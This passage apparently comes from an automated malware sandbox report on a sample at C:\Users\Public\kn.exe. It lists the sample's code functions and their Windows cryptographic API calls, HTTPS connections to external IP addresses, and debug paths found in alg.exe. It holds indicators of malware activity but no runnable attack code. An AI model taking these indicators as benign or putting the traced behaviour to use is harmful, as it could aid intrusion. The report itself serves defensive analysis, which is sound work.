                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B38CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,12_2_00007FF627B38CF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD2CF8 memset,#358,#357,CryptAcquireContextW,GetLastError,#357,#357,#358,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,DeleteFileW,LocalFree,#357,#357,#359,#359,LocalFree,LocalFree,#357,#357,#357,#357,#357,#359,#359,#359,#359,LocalFree,#359,#359,#357,12_2_00007FF627AD2CF8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B24C80 CryptAcquireContextW,GetLastError,#357,CryptGenRandom,GetLastError,CryptGenRandom,GetLastError,memset,CryptReleaseContext,12_2_00007FF627B24C80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16C88 NCryptEnumAlgorithms,#360,12_2_00007FF627B16C88
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A46C4C CryptFindOIDInfo,#357,#357,#359,CryptFindOIDInfo,#357,LocalFree,12_2_00007FF627A46C4C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0C3C NCryptExportKey,#205,#359,#359,#357,12_2_00007FF627AE0C3C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEACAC CryptContextAddRef,CryptDuplicateKey,#205,GetLastError,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,GetLastError,_CxxThrowException,??3@YAXPEAX@Z,12_2_00007FF627AEACAC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD4CA0 CryptAcquireCertificatePrivateKey,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CryptGetUserKey,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627AD4CA0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B18C58 #357,LocalAlloc,#357,memmove,memset,BCryptFreeBuffer,#357,#357,#360,#359,#359,#359,LocalAlloc,memmove,LocalAlloc,memmove,#357,#357,CryptGetDefaultProviderW,LocalAlloc,CryptGetDefaultProviderW,GetLastError,#357,#357,#357,LocalFree,LocalFree,12_2_00007FF627B18C58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2C80 CryptDestroyHash,#205,GetLastError,#357,SetLastError,12_2_00007FF627AE2C80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE2BC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16C30 NCryptOpenStorageProvider,#360,12_2_00007FF627B16C30
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7CC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,12_2_00007FF627A7CC24
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B10BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,12_2_00007FF627B10BF4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B10B9C CryptHashData,GetLastError,#357,12_2_00007FF627B10B9C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,12_2_00007FF627B0CBB4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B4EB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,12_2_00007FF627B4EB38
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6CB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,12_2_00007FF627A6CB98
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0B80 NCryptCreatePersistedKey,#205,#359,#359,#357,12_2_00007FF627AE0B80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2AE4 CryptAcquireContextW,#205,GetLastError,#359,#357,#359,SetLastError,12_2_00007FF627AE2AE4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0ABC BCryptVerifySignature,#205,#357,#357,#357,#357,12_2_00007FF627AE0ABC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD8AFC #357,CertCreateCertificateContext,GetLastError,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,CertSetCTLContextProperty,GetLastError,#357,#357,CertCloseStore,CertFreeCertificateContext,12_2_00007FF627AD8AFC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A82B00 BCryptEnumContexts,#360,BCryptQueryContextConfiguration,#360,#357,BCryptFreeBuffer,#357,BCryptEnumContextFunctions,#360,#360,BCryptFreeBuffer,#358,#358,#357,BCryptFreeBuffer,12_2_00007FF627A82B00
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B12A78 #357,CryptAcquireCertificatePrivateKey,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,#359,#359,12_2_00007FF627B12A78
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE8AA0 _CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,BCryptHashData,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE8AA0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A56A84 LocalAlloc,#357,memmove,CryptHashCertificate2,GetLastError,LocalAlloc,#357,memmove,LocalFree,12_2_00007FF627A56A84
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,12_2_00007FF627ACEA7C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAE9F0 IsDlgButtonChecked,memset,SendMessageW,LocalFree,GetDlgItemTextW,GetDlgItem,GetDlgItem,EnableWindow,LocalFree,#357,#357,CertFreeCertificateContext,CertFreeCTLContext,GetDlgItem,SendMessageW,SetDlgItemTextW,MessageBoxW,GetDlgItem,SendMessageW,GetDlgItemInt,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,#357,IsDlgButtonChecked,GetDlgItem,GetDlgItemTextW,new,GetDlgItem,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetDlgItemTextW,SendDlgItemMessageA,CheckDlgButton,GetDlgItem,EnableWindow,SetDlgItemInt,CheckDlgButton,SetDlgItemTextW,SetDlgItemTextW,CertFreeCTLContext,CertFreeCertificateContext,??3@YAXPEAX@Z,memset,SendMessageW,MessageBoxW,memset,CryptUIDlgViewCRLW,memset,CryptUIDlgViewCertificateW,12_2_00007FF627AAE9F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC4A34 CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptHashCertificate2,CryptEncodeObjectEx,GetLastError,CertGetCRLContextProperty,CryptEncodeObjectEx,GetLastError,CryptEncodeObjectEx,GetLastError,GetLastError,GetLastError,#357,LocalFree,12_2_00007FF627AC4A34
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE4A1C NCryptIsKeyHandle,_wcsicmp,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,12_2_00007FF627AE4A1C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0A18 BCryptSetProperty,#205,#359,#357,#357,12_2_00007FF627AE0A18
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACAA00 memset,memset,#357,#357,#357,#357,CryptEncodeObjectEx,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,GetLastError,CryptMsgEncodeAndSignCTL,GetLastError,#359,LocalFree,LocalFree,12_2_00007FF627ACAA00
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1A9F0 strcmp,GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,#357,#357,NCryptIsAlgSupported,#360,#357,LocalAlloc,memmove,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,LocalFree,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,LocalFree,GetLastError,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627B1A9F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6C960 LocalAlloc,CryptGetKeyIdentifierProperty,GetLastError,#357,LocalFree,LocalFree,12_2_00007FF627A6C960
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B12994 CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,12_2_00007FF627B12994
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE8940 BCryptFinishHash,#205,#357,#357,#357,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE8940
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AEC940 _CxxThrowException,GetLastError,_CxxThrowException,memmove,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,CryptHashData,#205,GetLastError,#357,#357,#357,SetLastError,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,12_2_00007FF627AEC940
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,12_2_00007FF627AA29A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE099C BCryptOpenAlgorithmProvider,#205,#359,#359,12_2_00007FF627AE099C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB18DC CertFindExtension,CryptDecodeObject,GetLastError,#357,12_2_00007FF627AB18DC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F918 CryptEncrypt,GetLastError,LocalFree,LocalAlloc,#357,LocalFree,12_2_00007FF627B0F918
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB8D0 I_CryptGetLruEntryData,#357,12_2_00007FF627ACB8D0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A63918 #357,#357,#357,#357,CertFindExtension,CryptDecodeObject,GetLastError,#357,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A63918
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE391C CryptVerifySignatureW,#205,GetLastError,#357,#359,#357,SetLastError,12_2_00007FF627AE391C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A538FC RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,12_2_00007FF627A538FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE3860
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,12_2_00007FF627ACD850
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AD184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,12_2_00007FF627AD184C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B198B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627B198B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A77884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,12_2_00007FF627A77884
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,12_2_00007FF627AB9878
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F7FC CryptExportKey,GetLastError,#357,LocalAlloc,CryptExportKey,GetLastError,LocalFree,12_2_00007FF627B0F7FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF97E4 LoadCursorW,SetCursor,#210,LoadCursorW,SetCursor,#357,EnableWindow,SetWindowLongPtrW,SetWindowLongPtrW,SetWindowLongPtrW,GetDlgItem,SetWindowTextW,GetDlgItem,ShowWindow,CryptUIDlgFreeCAContext,LocalFree,12_2_00007FF627AF97E4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A817D4 #357,#359,#357,NCryptFinalizeKey,#360,#359,#359,#357,NCryptDeleteKey,#360,#359,#359,#359,LocalFree,LocalFree,12_2_00007FF627A817D4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7F810 #223,CryptDecodeObjectEx,GetLastError,CertFindAttribute,CertFindAttribute,GetLastError,#357,LocalFree,LocalFree,12_2_00007FF627A7F810
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB808 I_CryptFindLruEntry,I_CryptGetLruEntryData,#357,I_CryptReleaseLruEntry,12_2_00007FF627ACB808
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAF774 CertFindExtension,#357,CryptVerifyCertificateSignature,GetLastError,GetLastError,memmove,LocalFree,12_2_00007FF627AAF774
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE5768 NCryptIsKeyHandle,??_V@YAXPEAX@Z,#357,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,GetLastError,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE5768
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE37A4 CryptSetKeyParam,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE37A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0D750 LocalAlloc,CryptFormatObject,GetLastError,#358,#358,LocalFree,#357,12_2_00007FF627B0D750
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFB794 CryptExportPublicKeyInfoEx,SetLastError,12_2_00007FF627AFB794
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A5B788 #140,iswdigit,CryptDecodeObject,GetLastError,#357,#357,#224,12_2_00007FF627A5B788
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7D790 SslEnumProtocolProviders,#357,SslOpenProvider,SslFreeBuffer,SslFreeObject,SslFreeBuffer,#359,LocalAlloc,BCryptGetProperty,CryptFindOIDInfo,BCryptDestroyKey,BCryptDestroyKey,LocalFree,12_2_00007FF627A7D790
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB577C #360,#358,CryptDecodeObject,GetLastError,#357,12_2_00007FF627AB577C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE36E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,12_2_00007FF627ACF6D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AB366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,12_2_00007FF627AB366C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B09688 CryptFindOIDInfo,#357,#360,#360,#360,12_2_00007FF627B09688
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,12_2_00007FF627ACB664
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A55664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,12_2_00007FF627A55664
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,12_2_00007FF627A6D660
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,12_2_00007FF627AE3654
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ADF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627ADF644
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A976B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627A976B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFD6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,12_2_00007FF627AFD6A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F650 CryptHashCertificate2,SetLastError,12_2_00007FF627B0F650
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,12_2_00007FF627AA55F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A6D5C2
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6F630 CryptAcquireContextW,GetLastError,#357,SetLastError,12_2_00007FF627A6F630
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,12_2_00007FF627AC95FC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B19580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,12_2_00007FF627B19580
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AAB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,12_2_00007FF627AAB55C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE3590
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F570 CryptHashCertificate,SetLastError,12_2_00007FF627B0F570
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFB4EC CryptDecodeObjectEx,SetLastError,12_2_00007FF627AFB4EC
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,12_2_00007FF627AA3504
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B114F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,12_2_00007FF627B114F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,12_2_00007FF627AE34F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AFB464 CryptEncodeObjectEx,SetLastError,12_2_00007FF627AFB464
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B0F4A0 CryptHashPublicKeyInfo,SetLastError,12_2_00007FF627B0F4A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A45438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,12_2_00007FF627A45438
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,12_2_00007FF627ACF488
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,12_2_00007FF627AE9480
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,12_2_00007FF627AA13F0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC53E8 CryptEncodeObjectEx,GetLastError,#357,12_2_00007FF627AC53E8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,12_2_00007FF627ACB3D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,12_2_00007FF627B1141C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,12_2_00007FF627AE342C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,12_2_00007FF627A6B36C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A9B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,12_2_00007FF627A9B350
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B1739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,12_2_00007FF627B1739C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B193A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,12_2_00007FF627B193A0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,12_2_00007FF627AA5338
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A77340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,12_2_00007FF627A77340
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AF33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,12_2_00007FF627AF33B0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,12_2_00007FF627AC33A0
                      Source: unknown HTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.10:49731 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49824 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49940 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49953 version: TLS 1.2
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
